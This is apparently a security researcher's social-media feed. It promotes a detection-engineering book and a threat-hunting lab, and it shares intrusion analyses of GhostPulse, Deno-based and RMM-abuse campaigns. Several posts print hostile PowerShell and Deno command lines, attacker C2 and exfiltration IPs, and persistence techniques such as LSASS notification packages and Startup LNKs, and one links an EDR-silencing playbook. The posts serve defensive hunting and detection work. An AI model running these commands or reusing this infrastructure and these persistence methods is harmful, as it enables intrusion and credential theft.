I wrote a book! A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering. Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to. koifsec.medium.com/my-book-a… amazon.com/dp/B0GT1LQHF6

𝗧𝗵𝗲 𝗧𝗵𝗿𝗲𝗮𝘁 𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗟𝗲𝗮𝗴𝘂𝗲 𝗶𝘀 𝗰𝗼𝗺𝗶𝗻𝗴 We’re launching the Threat Hunting League, a recurring competition series for threat hunters, detection engineers, incident responders, and SOC analysts. Each round is built around realistic intrusion activity. Participants investigate evidence, submit findings, earn points, climb the leaderboard, and compete across the wider season. First 3 winners will receive prizes! For this first competition that we'll be announcing soon, the first-place winner will receive a course giveaway from a leading security training provider! We’ll announce the first event soon, including the scenario, registration window, prize details, and scoring format. Learn more about The Threat Hunting League and upcoming competitions: threathuntinglabs.com/compet…

The Interesting Case of WSL for Payload Staging detect.fyi/the-interesting-c…

Published a new article that examines WSL for payload staging, check it out > detect.fyi/the-interesting-c…

Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it. @HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub. The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog. Thanks @KoifSec for the contribution. 🫡 🔗 lolrmm.io/tools/komari 🧩 github.com/magicsword-io/LOL… 📖 huntress.com/blog/komari-c2-…

Published a new post right now on DetectFYI: "The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy! detect.fyi/the-life-dinner-p…

Found a TP today from the Axios incident. The observed command was: C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000 wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.

Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/i…

New post out! "The Red Queen’s Race: Arms Race Dynamics in Threat Detection" medium.com/@koifsec/the-red-…

New post out! detect.fyi/the-invisible-kil…

If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - deps.sh - completely usable from the CLI as well. Enjoy!

LSASS DLL loading can be abused to establish persistence inside a highly privileged system process. This registry modification alters the Notification Packages value under the LSA key, causing LSASS to load additional packages at startup. Any unexpected LSA Notification Packages entry should be treated as suspicious. hackers-arise.com/advanced-w… @three_cube @_aircorridor @DI0256 #redteam #DFIR #blueteam #pentest

We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏 We will invite the second wave early next week! Thank you to everyone who is providing feedback!

Introducing the "Adversarial Detection Engineering (ADE) Framework" ! Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code. github.com/NikolasBielski/Ad… adeframework.org/

I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques. Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: virustotal.com/gui/file/81f9… PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging. PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\<user>\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading… explorer.exe └─ powershell.exe -nop -w hidden └─ msiexec.exe s1161271080.msi └─ S_Circuitr.exe └─ PlaneV128.exe (GhostPulse) ├─ chrome.exe --headless ├─ msedge.exe --headless └─ msiexec.exe sup.msi └─ superintendent.exe Signed executables using ZONER/Crisp IM certificates observed throughout the chain. Links: • joesandbox.com/analysis/1862… • tria.ge/260205-ce1n5sdv3g • bazaar.abuse.ch/sample/d63f3… Hunt for PowerShell cradles paired with --headless browser launches. What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out. cc @malwrhunterteam

New post out! "Move and Countermove: Game Theory Aspects of Detection Engineering" koifsec.medium.com/move-and-…

#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer. Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot. VT next

I’m moving all Threat Hunting Labs logistics to @ThruntingLabs. I want to keep this personal feed focused on research and thoughts without spamming you with project updates. If you're waiting on access or status news, follow there! 🙏

This is a very interesting intrusion using deno.exe in a way I haven’t personally seen before. What stands out here is not just Deno itself, but the full execution chain and how multiple runtimes are stitched together. It starts via an MSI that launches a VBS script. VBS acts as the initial orchestrator: it drops and runs PowerShell, installs Deno, writes a JavaScript runner to %LOCALAPPDATA%, and explicitly creates a Startup LNK for persistence. That LNK points to a hidden PowerShell command which executes deno run --allow-all romeo_worker74.cjs(good detection opportunity!!), ensuring execution on every user logon. From there, Deno takes over as a loader/backdoor. It fingerprints the host, reaches out to sharecodepro\.com, and waits for server-delivered modules. It then kicks off a scheduled task that runs pythonw.exe from C:\ProgramData\<random_chars>\, executing a Python backdoor. Defender exclusions are added for the Python path to reduce visibility. The Python component connects to 23\.94\.145\.120:9999 as its main C2 and also queries ip-api\.com for basic situational awareness. PowerShell is additionally used to retrieve more payloads (Petuhon\.zip, Smokest120\.zip), indicating parallel tooling or follow-on stages. In short, this is a multi-stage, multi-language intrusion: VBS for orchestration and persistence PowerShell for payload delivery Deno as a modular execution framework Python as a secondary, more traditional C2 channel Lightweight components, user-level persistence, and flexible server-driven capabilities. The execution pattern is the most interesting part here. I'll update this post if anything else.

📢 EDR Silencing 📖 1x Playbook -  A structured breakdown of the full approach 💡 6x Procedures - Practical, reproducible techniques mapped to real-world operator workflows 🚨 1x Sigma Rule - To help defenders spot this activity 💭 Would love your thoughts ipurple.team/2026/01/12/edr-… #purpleteam #ipurple #redteam